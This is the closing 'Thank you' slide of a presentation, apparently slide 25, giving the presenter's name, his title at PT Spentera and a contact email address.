  • 25. Thank you Thomas Gregory Director and Partner at PT Spentera tom@spentera.id 25